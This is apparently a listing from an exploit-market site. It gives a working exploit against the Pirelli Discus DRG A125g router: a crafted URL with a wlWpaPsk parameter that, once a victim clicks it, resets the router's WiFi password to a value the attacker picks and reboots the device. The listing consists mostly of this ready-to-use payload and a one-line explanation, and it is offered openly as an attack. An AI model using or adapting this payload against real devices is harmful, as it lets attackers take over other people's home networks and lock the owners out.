[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Pirelli Discus DRG A125g - Remote Change WiFi Password Vulnerability

Author
Sebastián Magof
Risk
[
Security Risk High
]
0day-ID
0day-ID-21560
Category
web applications
Date add
24-11-2013
Platform
hardware
http://10.0.0.2/wladv.wl?wlSsidIdx=0&wlHide=0&wlAuthMode=psk2&wlAuth=0&wlWep=disabled&wlWpaPsk=PASSWORDHERE&wlWpaGtkRekey=0&wlKeyBit=1&wlPreauth=1&wlWpa=tkip
 
info: where the parameter wlWpaPsk=PASSWORDHERE is where we will enter the
password we want to put the victim wifi. If the victim clicks on the url
your modem / router will reboot automatically with the new password
provided by the attacker.

#  0day.today [2024-11-15]  #